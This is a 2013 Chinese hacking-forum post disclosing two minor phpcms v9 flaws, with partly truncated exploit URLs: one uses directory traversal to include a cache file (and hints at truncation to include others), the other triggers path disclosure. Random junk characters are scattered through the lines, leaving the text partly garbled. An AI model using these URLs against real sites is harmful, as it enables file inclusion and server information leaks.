找回密码
 立即注册
查看: 2856|回复: 0
打印 上一主题 下一主题

phpcms v9两个鸡肋漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
/ }& Q  N  ?1 D2 q; Y3 V' j7 Z) u! ^& r; s% `8 ]5 n* d3 Z3 a3 m
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck  }% o2 g' g9 u2 `
. ?1 b. `9 ]( D
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
( V8 D& ^1 k" e' e9 y& H1 _' c# p
! D. w' Y; F( n( U3 G" Q; w8 i) UExp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
" ?( O1 I; I# r: Q* q% g6 {( _6 Y8 r' _
#暴路径
2 {/ c. _6 y4 G- g# Z" u8 i3 v8 U. v% [/ a4 x
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
6 @2 c4 X+ h+ j
% ~+ L" [! [/ G
, R+ L2 S4 [5 X1 s5 v
5 i* o" r! k/ M$ O+1
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表